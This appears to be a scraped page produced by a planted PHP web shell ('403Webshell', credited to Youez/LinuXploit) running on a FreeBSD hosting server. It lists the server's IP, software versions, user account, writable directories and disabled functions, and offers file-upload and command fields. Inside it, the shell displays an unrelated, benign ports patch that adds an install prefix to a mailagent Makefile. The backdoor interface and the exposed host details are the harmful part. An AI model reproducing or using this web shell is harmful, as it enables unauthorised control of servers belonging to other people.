403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/mailagent/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/mailagent/files/patch-agent-examples-Makefile.SH
--- ./agent/examples/Makefile.SH.orig	2006-08-24 22:24:12.000000000 +0900
+++ ./agent/examples/Makefile.SH	2014-08-14 01:59:33.512702931 +0900
@@ -84,7 +84,7 @@
 install::
 	@for dir in $(PRIVLIB)/examples; do \
 	case '${MFLAGS}' in *[i]*) set +e;; esac; \
-	(set -x; test -d $$dir || $(INSTALLDIR) $$dir); \
+	(set -x; test -d $(INSTALL_PREFIX)$$dir || $(INSTALLDIR) $(INSTALL_PREFIX)$$dir); \
 	done
 
 deinstall::
@@ -93,7 +93,7 @@
 install:: $(FILES)
 	@case '${MFLAGS}' in *[i]*) set +e;; esac; \
 	for i in $(FILES); do \
-	(set -x; $(INSTALL) -c -m 444 $$i $(PRIVLIB)/examples); \
+	(set -x; $(INSTALL) -c -m 444 $$i $(INSTALL_PREFIX)$(PRIVLIB)/examples); \
 	done
 
 deinstall::

Youez - 2016 - github.com/yon3zu
LinuXploit